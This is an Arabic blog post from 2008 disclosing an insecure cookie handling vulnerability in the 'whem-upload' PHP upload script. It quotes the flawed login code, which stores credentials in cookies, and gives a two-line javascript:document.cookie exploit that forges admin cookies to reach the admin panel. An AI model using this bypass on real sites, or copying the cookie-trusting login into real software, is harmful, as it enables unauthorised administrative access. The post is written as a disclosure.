whem-upload Insecure Cookie Handling Vulnerability.

ديسمبر 22, 2008

كنت عم دور على سكربت لرفع الصور.

وجدت whem-upload

نزلته و جدت مشكلة فيه و انا عم حلها اكتشفت فيه ثغرة 8-)
و هي اول مرة بحياتي بلاقي ثغرة بسكربت 8-) :-D

ارجو من الكل ان لا ستخدمها في إيذاء المواقع الاخرى.

انا مالي مسؤول عن اي ضرر بصيب المواقع من جراء كشفي للثغرة.

بعتت رسالة لصاحب السكربت وحيد ومارد الحق عليه إذا صار شي.بتمنى من الكل أنو ما يستخدموها لاختراق المواقع

النقل مسموح مع ذكر المصدر.

////////////////////////////////////////////////////////////////////////////

---------------------------
wehm-up 1.0 I.Cookie Hand.
---------------------------
Author: Adnan ( zizo.h)
Email: a-homssi@scs-net.org
Download: up
---------------------------
Bug In: \login.php

$user = $_POST['user'];
$pass = $_POST['pass'];
if ($user == “$mem_user” and $pass == “$mem_pass”){
setcookie(“mem_user”, “$user”, time() + 1000);
setcookie(“mem_pass”, “$pass”, time() + 1000);

Exploit:
login:
admin/login.php
javascript:document.cookie = "whem_Name=admin; path=/";
javascript:document.cookie = "whem_Password=admin; path=/";

then \admin\index.php # So Easy To Hack :P 
Greetz:All No_Hack Members,Sniper-Sa;
///////////////////////////////////////////////////////////
لأي استفسار الرجاء مراسلتي.
سلام.

Entry Filed under: Hacking. وسوم: , .

Leave a Comment

Required

Required, hidden

Some HTML allowed:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <pre> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Trackback this post  |  Subscribe to the comments via RSS Feed


شو في شي جديد

مجتمع التدوين السوري

عدادت

Feeds

أهم النقرات

الأرشيف

وسوم

3G Graphics GUI Java javascript JSP JSTL linux MTN MySql opensource php Ruby Surf Syriatel tomcat ubunut إسرائيل إسلام دين عيد اتصالات اتصالات3G احتلال اللايك برامج برمجة تاسع تخلف تعليم دفع الكتروني عدوان غباء فلسطين قراءة كتب من برمجتي

أحدث التعليقات

sEKAROz on برنامج Hotspot Shield لفك حجب…
Rakan.Sukar on تجربتي عن Syriatel 3G
ابن داحم on برنامج Hotspot Shield لفك حجب…
محمود on الصف التاسع(السنة الجاية)
موقع نادى الزمالك تي… on تنصيب JDK + Tomcat on Ubu…

صفحات

تعليقات مزعجة

تقويم

ديسمبر 2008
الجمعة السبت الأحد الأثنين الثلاثاء الأربعاء الخميس
« نوفمبر   يناير »
 1234
567891011
12131415161718
19202122232425
262728293031  

Blogroll

منوعات